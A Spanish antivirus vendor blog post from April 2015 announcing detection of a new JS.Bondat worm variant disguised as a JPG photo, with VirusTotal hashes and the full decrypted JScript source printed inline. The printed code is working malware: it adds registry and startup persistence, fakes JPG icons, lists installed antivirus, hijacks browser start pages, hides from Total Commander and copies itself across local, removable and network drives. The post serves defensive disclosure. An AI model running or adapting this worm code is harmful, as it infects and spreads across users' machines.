NUEVA VARIANTE DE JS.BONDAT (variante cifrada de JS:CRISAS)

 

Una nueva variante que llega en fichero DSC04492.JPG .jse (aparenta ser un JPG pero realmente es un JS), pasa a ser controlado a partir del ELISTARA 23.17 de hoy

El preanalisis de virustotal ofrece el siguiente informe:

MD5 9df7381e713b6bb6721c68ceb898d9c2
SHA1 5a694472f5ce9bf23d669ddd4dc967fb0a8ab7e4
File size 25.9 KB ( 26563 bytes )
SHA256: bab05a7e7bd1421a5b5e5a6c9c3b550fdff0d17331a656e461a85ddbd59ab9c3
File name: DSC04492.JPG …
Detection ratio: 3 / 57
Analysis date: 2015-04-27 08:40:07 UTC ( 2 hours, 39 minutes ago )

0 1

Antivirus Result Updatebo
DrWeb SCRIPT.Virus 20150427
McAfee-GW-Edition BehavesLike.JS.ExploitBlacole.mx 20150427
NANO-Antivirus Trojan.Script.StartPage.gcle 20150427

El fichero descifrado ofrece este script:

try{a=WScript.CreateObject(‘Scri’+’pting.Fi’+’leSys’+’temObj’+’ect’);b=WScript.CreateObject(‘WSc’+’ript.Sh’+’ell’);s=WScript.CreateObject(‘She’+’ll.Appli’+’cation’);wl=WScript.CreateObject(‘WbemScr’+’ipting.SWbemL’+’ocator’);db=WScript.CreateObject(‘ADO’+’DB.Str’+’eam’);db.CharSet=”US-ASCII”;db.Type=2;c3=b.SpecialFolders(“Startup”);nt6=(b.RegRead(‘HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion’)>=6?true:false);jico=b.RegRead(“HKLM\\SOFTWARE\\Classes\\”+b.RegRead(“HKLM\\SOFTWARE\\Classes\\.jpg\\”)+”\\DefaultIcon\\”);ico=”explorer.exe”;g=WScript.ScriptFullName;da=new Date();ano=da.getYear()+””;mes=da.getMonth();dia=da.getDate();hra=0;antv=new Array(“”);rgk=”HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run”;wlg=”HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell”;gn=new Array(“IMG”,”IMG_”,”PIC”,”DSC”,”CIMG”,”HPIM”,”IMAG”,”DSCF”,”DSCN”,”DCIM”,”IM”,”PICT”,”SAM_”);sp=””;for(r=0;r<94;r++){sp+=” “;}ex=gn[Math.round(Math.random()*12)]+ano.substring(2,4)+””+mes+dia+”.JPG”+sp+”.jse”;jex=””;tas=”explorer”;fsz=a.GetFile(g).Size;wsc=WScript.FullName;stl=”https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+”;stp=stl+fsz;if(s.NameSpace(26)==”Roaming”){tot=a.GetFolder(s.NameSpace(26).ParseName(“Microsoft”).Path).ParentFolder;}else{tot=s.NameSpace(40).ParseName(s.NameSpace(26)).Path;}nt();}catch(e){}sf=””;function nt(){try{c1=s.NameSpace(28).ParseName(“microsoft”);c2=c1.GetFolder.Items().Count;rf=Math.round(Math.random()*c2-1);c4=c1.GetFolder.Items().item(rf).Path;if(a.FolderExists(c4)==false){c4=a.GetFile(c4).ParentFolder;}}catch(e){c4=c1.Path;}c5=Math.random()*8+1+””;c5=c5.replace(“.”,””);try{b.RegWrite(“HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\”,jico,”REG_SZ”);}catch(e){}try{jtyp=b.RegRead(“HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName”);b.RegWrite(“HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName”,jtyp,”REG_EXPAND_SZ”);}catch(e){}try{b.RegWrite(“HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\”,jico,”REG_SZ”);}catch(e){}try{b.RegWrite(“HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName”,jtyp,”REG_EXPAND_SZ”);}catch(e){}if(g.substring(g.lastIndexOf(“\\”)+1,g.length).toLowerCase().search(“.jpg”+sp+”.jse”)!=-1){try{if(a.FileExists(g.substring(0,g.lastIndexOf(sp+”.jse”)))==true){b.run(‘”‘+g.substring(0,g.lastIndexOf(sp+”.jse”))+'”‘);}else{wp=b.RegRead(“HKCU\\Control Panel\\Desktop\\Wallpaper”);if(wp.substring(wp.lastIndexOf(“\\”)+1,wp.length)==”TranscodedWallpaper”){jpgc=b.RegRead(“HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\”).replace(“%1”,wp);b.run(jpgc);}else{b.run(‘”‘+wp+'”‘);}}}catch(e){}try{sc=wl.ConnectServer(null, “root\\default”);rg=sc.Get(“StdRegProv”);m=rg.Methods_.Item(“EnumValues”);pin=m.InParameters.SpawnInstance_();rk=new Object();rk[“HKCU”]=rk[“HKEY_CURRENT_USER”]=0x80000001;rv=rk[rgk.substr(0,rgk.indexOf(“\\”))];pin.hDefKey=rv;pin.sSubKeyName=rgk.substr(rgk.indexOf(“\\”) + 1);pot=rg.ExecMethod_(m.Name,pin);ak=pot.sNames.toArray();for(key in ak){tts=b.RegRead(rgk+”\\”+ak[key])+””;if(tts.search(“.exe”)!=-1){tts2=tts.substring(0,tts.search(“.exe”));tts3=tts2.substring(tts2.lastIndexOf(“:”)-1,tts2.length)+”.exe”;if(a.FileExists(tts3)==true){ico=tts3;}if(tts2.indexOf(“\\”)!=-1){tts2=tts2.substring(tts2.lastIndexOf(“\\”)+1,tts2.length);}tas=tts2;}}}catch(e){}if(tas.indexOf(” “)!=-1){tas=tas.substring(0,tas.indexOf(” “));}if(tas.indexOf(“.”)!=-1){tas=tas.substring(0,tas.indexOf(“.”));}try{newd=fsz;olddf=b.RegRead(wlg);olddf=olddf.substring(olddf.lastIndexOf(‘” “‘)+3,olddf.lastIndexOf(‘”‘));}catch(e){olddf=shcu();}if(a.FileExists(olddf)==true){c4=a.GetFile(olddf).ParentFolder;oldd=a.GetFile(olddf).size;}else{oldd=0;olddf=c4+”\\”+c5;}if(newd>=oldd){if(a.FileExists(olddf)==true){a.GetFile(olddf).Attributes=0;}db.Open();try{av=GetObject(“winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter”+(nt6?’2’:”));avi=av.ExecQuery(“SELECT * FROM AntiVirusProduct”,”WQL”);navi=new Enumerator(avi);antv=new Array();for(;!navi.atEnd();navi.moveNext()){oav=navi.item();antv.push(oav.displayName);}}catch(e){antv=new Array(“NAC”);}try{vic=”<“+b.RegRead(“HKCU\\Volatile Environment\\LOGONSERVER”).replace(“\\\\”,””)+”:”+b.RegRead(“HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName”)+”=”+s.NameSpace(40)+”:”+antv+”>”;}catch(e){vic=””;}cod=ci();if(cod.search(vic)==-1&&rad!=0){nda=vic+”**/”;his=cod.replace(“**/”,nda);db.WriteText(his);}else{db.WriteText(cod);}db.SaveToFile(olddf,2);db.Close();try{if(a.GetFile(olddf).OpenAsTextStream(1,-2).ReadAll().charCodeAt(0)!=122){a.CopyFile(g,olddf,true);}a.GetFile(olddf).Attributes=2;}catch(e){}wsh=c4+”\\”+tas+”.exe”;try{a.CopyFile(wsc,wsh);}catch(e){}a.GetFile(wsh).Attributes=2;try{drg='”‘+wsh+'” “‘+olddf+'” //E:JScript //B’;shcu();ec=b.CreateShortcut(c3+”\\”+tas+”.lnk”);ec.TargetPath=c4+”\\”+tas+”.exe”;ec.Arguments='”‘+olddf+'” //E:JScript //B -ns’;ec.IconLocation=ico;ec.Save();b.RegWrite(wlg,drg,’REG_SZ’);WScript.Sleep(9999);if(b.RegRead(wlg)==drg){a.DeleteFile(c3+”\\”+tas+”.lnk”);}}catch(e){}}}else{try{if(WScript.Arguments.length==0){b.run(“explorer.exe”);}}catch(e){}try{fcfp=new Array();tcmd=new Array();for(t=0;t<9;t++){tcmd.push(tot+”\\TC201″+t+”\\tcignore.txt”);try{fcfp.push(s.NameSpace(38).ParseName(“TotalCommander201″+t).Path+”\\Tools\\Mozilla Firefox\\defaults\\profile”);}catch(e){}try{fcfp.push(s.NameSpace(48).ParseName(“TotalCommander201″+t).Path+”\\Tools\\Mozilla Firefox\\defaults\\profile”);}catch(e){}}try{tcmd.push(s.NameSpace(38).ParseName(“TC UP”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(48).ParseName(“TC UP”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(28).ParseName(“ghisler”).Path+”\\tcignore.txt”);}catch(e){}try{tcmd.push(s.NameSpace(26).ParseName(“ghisler”).Path+”\\tcignore.txt”);}catch(e){}tcmd.push(“c:\\totalcmd\\tcignore.txt”);for(t=0;t<tcmd.length;t++){if(a.FileExists(tcmd[t].replace(“tcignore.txt”,”wincmd.ini”))==true){try{db.Open();if(a.FileExists(tcmd[t])==false){ttn=a.CreateTextFile(tcmd[t],true);ttn.Write(“**.**.jse”);ttn.close();}igl=””;try{db.LoadFromFile(tcmd[t]);igl=db.ReadText;}catch(e){}db.Close();if(igl.indexOf(“**.**.jse”)==-1){db.Open();db.WriteText(igl,1);db.WriteText(“**.**.jse”,1);a.DeleteFile(tcmd[t]);db.SaveToFile(tcmd[t]);db.Close();}}catch(e){}try{tor=a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder+”\\Wincmd.ini”,1,true,0);toa=tor.ReadAll();if(toa.search(“IgnoreListFileEnabled=0”)!=-1){toa=toa.replace(“IgnoreListFileEnabled=0″,”IgnoreListFileEnabled=1”);}if(toa.search(“IgnoreListFile=”)==-1){toa=toa.replace(“[Configuration]”,”[Configuration]”+”\nIgnoreListFile=”+tcmd[t]);}if(tcmd[t].search(“TC201”)!=-1){if(toa.search(“=*.jse”)==-1){filt=toa.substring(toa.lastIndexOf(“Filter”)+6,toa.lastIndexOf(“.icon=”));enf=toa.substring(toa.lastIndexOf(“Filter”),toa.length);enl=enf.substring(0,enf.indexOf(“\n”)+1);fln=new Number(filt)+1;ficon=toa.substring(toa.search(“Filter11.icon=”)+14,toa.length);dicon=ficon.substring(0,ficon.search(“\n”));toa=toa.replace(enl,enl+”\nFilter”+fln+”=*.jse\nFilter”+fln+”.icon=”+dicon+”\n”);toa=toa.replace(“FileTipWindows=1″,”FileTipWindows=0”);}}tor.close();tow=a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder+”\\Wincmd.ini”,2,true,0);tow.Write(toa);tow.close();}catch(e){}}}}catch(e){}try{b.RegWrite(“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page”,stp,”REG_SZ”)}catch(e){}try{if(a.FolderExists(tot+”\\Mozilla\\Firefox\\Profiles”)==true){fpf=a.GetFolder(tot+”\\Mozilla\\Firefox\\Profiles”);pff=new Enumerator(fpf.SubFolders);for(;!pff.atEnd();pff.moveNext()){pfs=pff.item()+””;if(pfs.search(“.default”)!=-1){fcfp.push(pfs);}}}for(q=0;q<fcfp.length;q++){try{if(a.FileExists(fcfp[q]+”\\prefs.js”)==true);{fjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,1);fjs=fjf.ReadAll();fjf.close();usp=’user_pref(“browser.startup.homepage”,’;if(fjs.indexOf(usp)!=-1){fjs1=fjs.substring(fjs.indexOf(usp)+37,fjs.length);fjs2=fjs1.substring(0,fjs1.indexOf(‘);’)+2);fjs3=fjs.replace(usp+fjs2,usp+’ “‘+stp+'”);’);wjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,2);wjf.Write(fjs3);}else{wjf=a.OpenTextFile(fcfp[q]+”\\prefs.js”,8);wjf.WriteLine(‘\n’+usp+’ “‘+stp+'”);’);}wjf.close();}}catch(e){}}}catch(e){}try{gfs=s.NameSpace(28).ParseName(“Google”).Path+”\\Chrome\\User Data\\Default\\Preferences”;if(a.FileExists(gfs)==true){gjf=a.OpenTextFile(gfs,1);gjs=gjf.ReadAll();gjf.close();gjsn=gjs.length;urs='”urls_to_restore_on_startup”: [‘;ros='”restore_on_startup”:’;rosm='”restore_on_startup_migrated”:’;if(gjs.indexOf(stl)==-1){if(gjs.indexOf(urs)!=-1){gjs1=gjs.substring(gjs.indexOf(urs)+31,gjsn);gjs2=gjs1.substring(0,gjs1.indexOf(“]”)+1);gjs3=gjs.replace(urs+gjs2,urs+’ “‘+stp+'”, ‘+gjs2);}else{gjs1=gjs.substring(gjs.indexOf(rosm),gjsn);gjs2=gjs1.substring(0,gjs1.indexOf(“\n”)+1);gjs3=gjs.replace(gjs2,rosm+’ true,\n\t’+urs+’ “‘+stp+'” ]\n’);}gjs4=gjs.substring(gjs.indexOf(ros),gjsn);gjs5=gjs4.substring(0,gjs4.indexOf(‘,’)+1);gjs3=gjs3.replace(gjs5,ros+’ 4,’);wjg=a.OpenTextFile(gfs,2);wjg.Write(gjs3);wjg.close();}else{fds=gjs.substring(gjs.indexOf(stl),gjs.length);fdc=fds.substring(0,fds.indexOf(‘”‘));gjs4=gjs.replace(fdc,stp);wjg=a.OpenTextFile(gfs,2);wjg.Write(gjs4);wjg.close();}}}catch(e){}mk();}}function mk(){WScript.Sleep(120000);try{c=new Enumerator(a.Drives);for(;!c.atEnd();c.moveNext()){tipodisco=c.item().DriveType;switch(tipodisco){case 1:case 3:if(c.item()!=”A:” && c.item()!=”B:”){try{sf=a.GetFolder(pe(c.item()+”\\”));tgf=new Enumerator(sf.files);for(;!tgf.atEnd();tgf.moveNext()){stf=tgf.item()+””;if(stf.substring(stf.length-4,stf.length).toUpperCase()==”.JPG”){jex=tgf.item().Name+sp+”.jse”;}if(stf.toLowerCase().indexOf(“.jpg”+sp+”.jse”)!=-1){ex=tgf.item().Name;}}if(a.FileExists(sf+”\\”+ex)==false){if(jex!=””){ex=jex;}a.CopyFile(g,sf+”\\”+ex);if(a.FileExists(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(sf+”\\”+ex).Attributes=a.GetFile(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes;}else{a.GetFile(sf+”\\”+ex).Attributes=0};if(a.FileExists(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(sf+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes=2;}}else{if(a.GetFile(sf+”\\”+ex).Size<fsz){a.GetFile(sf+”\\”+ex).Attributes=0;a.DeleteFile(sf+”\\”+ex);a.CopyFile(g,sf+”\\”+ex);a.GetFile(sf+”\\”+ex).Attributes=0;}}}catch(e){}sf=””;}break;default:break;}}}catch(e){}try{if(hra<12){hra+=1;}if(hra==12){dns=s.NameSpace(18);ens=dns.Items().Count;hns=new Array();for(f=0;f<ens;f++){gns=dns.Items().item(f);hns.push(“dns.Items().Item(“+f+”).GetFolder”);}for(i=0;i<hns.length;i++){try{jns=eval(hns[i]).Items().Count;for(l=0;l<jns;l++){if(a.FolderExists(eval(hns[i]+”.Items().item(“+l+”).Path”))==false){hns.push(hns[i]+”.Items().item(“+l+”).GetFolder”);}else{try{dis=pe(eval(hns[i]+”.Items().item(“+l+”).Path”)+”\\”)+””;di=a.GetFolder(dis);tgf=new Enumerator(di.files);for(;!tgf.atEnd();tgf.moveNext()){stf=tgf.item()+””;if(stf.substring(stf.length-4,stf.length).toUpperCase()==”.JPG”){jex=tgf.item().Name+sp+”.jse”;}if(stf.toLowerCase().indexOf(“.jpg”+sp+”.jse”)!=-1){ex=tgf.item().Name;}}if(a.FileExists(di+”\\”+ex)==false&&dis.charAt(1)!=”:”){if(jex!=””){ex=jex;}a.CopyFile(g,di+”\\”+ex);if(a.FileExists(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(di+”\\”+ex).Attributes=a.GetFile(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes;}else{a.GetFile(di+”\\”+ex).Attributes=0;}if(a.FileExists(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”)))==true){a.GetFile(di+”\\”+ex.substring(0,ex.lastIndexOf(sp+”.jse”))).Attributes=2;}}else{if(a.GetFile(di+”\\”+ex).Size<fsz){a.GetFile(di+”\\”+ex).Attributes=0;a.DeleteFile(di+”\\”+ex);a.CopyFile(g,di+”\\”+ex);a.GetFile(di+”\\”+ex).Attributes=0;}}}catch(e){}}}}catch(e){}}hra=0;}}catch(e){}mk();}function ci(){try{db2=a.OpenTextFile(g,1);g2=db2.ReadAll();db2.Close();g3=g2.substring(g2.search(‘z=”‘)+3,g2.search(‘”;’));g1=g2.substring(0,g2.search(‘z=”‘)+3);gr=g2.substring(g2.search(‘”;’),g2.length);t=ll;tt=””;tm=t.length;rac=Math.round(Math.random()*98)+1;for(x=0;x<tm;x++){num=t.charCodeAt(x)+rac;hx=num.toString(16);if(hx.length<2){hx=”0″+hx;}tt+=hx;hx=”;}if(rac<10){rac=”0″+rac;}tt+=rac;g4=g1+tt+gr;return g4;}catch(e){}}function pe(tar){onef=false;sfp=a.GetFolder(tar);tgc=new Enumerator(sfp.subFolders);for(;!tgc.atEnd();tgc.moveNext()){stc=tgc.item().Name.toLowerCase();if(stc.search(“foto”)!=-1||stc.search(“photo”)!=-1||stc.search(“image”)!=-1||stc.search(“im\u00E1ge”)!=-1||stc.search(“picture”)!=-1){if(onef==false){sfp=a.GetFolder(tgc.item()+”\\”);}onef=true;}}return sfp;}function shcu(){cshc=””;lnks=new Enumerator(a.GetFolder(c3).files);for(;!lnks.atEnd();lnks.moveNext()){try{lks=lnks.item()+””;if(lks.substring(lks.length-4,lks.length).toLowerCase()==”.lnk”){lnka=b.CreateShortcut(lnks.item()).Arguments;if(lnka.search(“//E:JScript //B -ns”)!=-1){cshc=lnka.substring(lnka.indexOf(‘”‘)+1,lnka.lastIndexOf(‘”‘));a.DeleteFile(lnks.item());}}}catch(e){}}return cshc;}

Su preanalisis ofrece el siguiente informe:

MD5 d7b3199951cc07775a97b2458b24c646
SHA1 dfcdcfca4b606902e7540c75b77e4b512210a8d2
SHA256 5f3ad66ad50314fa5553ce1d2d335e3cbc7437f1011a24f6c8bea2a8fc9a84fd
ssdeep192:Q1eZtf8X+Ai/YKVZvwxFsqCq7HkRNymVyKP2TqABly0zDwg0rVCLo2t7OSghIg:GeQOAUmGLq7EVPADym8ZpCM2tS2g
File size 12.6 KB ( 12879 bytes )

SHA256: 5f3ad66ad50314fa5553ce1d2d335e3cbc7437f1011a24f6c8bea2a8fc9a84fd
File name: CodigoVirico.txt
Detection ratio: 9 / 57
Analysis date: 2015-04-27 09:10:42 UTC ( 2 hours, 16 minutes ago )

0 1
Antivirus Result Update
Avast VBS:Obfuscated-gen [Trj] 20150427
DrWeb SCRIPT.Virus 20150427
ESET-NOD32 JS/Bondat.E 20150427
Ikarus Worm.JS.Bondat 20150427
NANO-Antivirus Trojan.Script.StartPage.gcle 20150427
Qihoo-360 Trojan.Generic 20150427
Tencent Js.Worm.Bondat.Wtdj 20150427
TrendMicro-HouseCall Suspicious_GEN.F47V0423 20150427
Zillya Dropper.Inor.VBS.2 20150426

DICHA VERSION DEL ELISTARA 23.17 ESTARÁ DISPONIBLE EN NUESTRA WEB A PARTIR DE las 19 h CEST DE HOY
saludos

ms; 27-4-2015

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies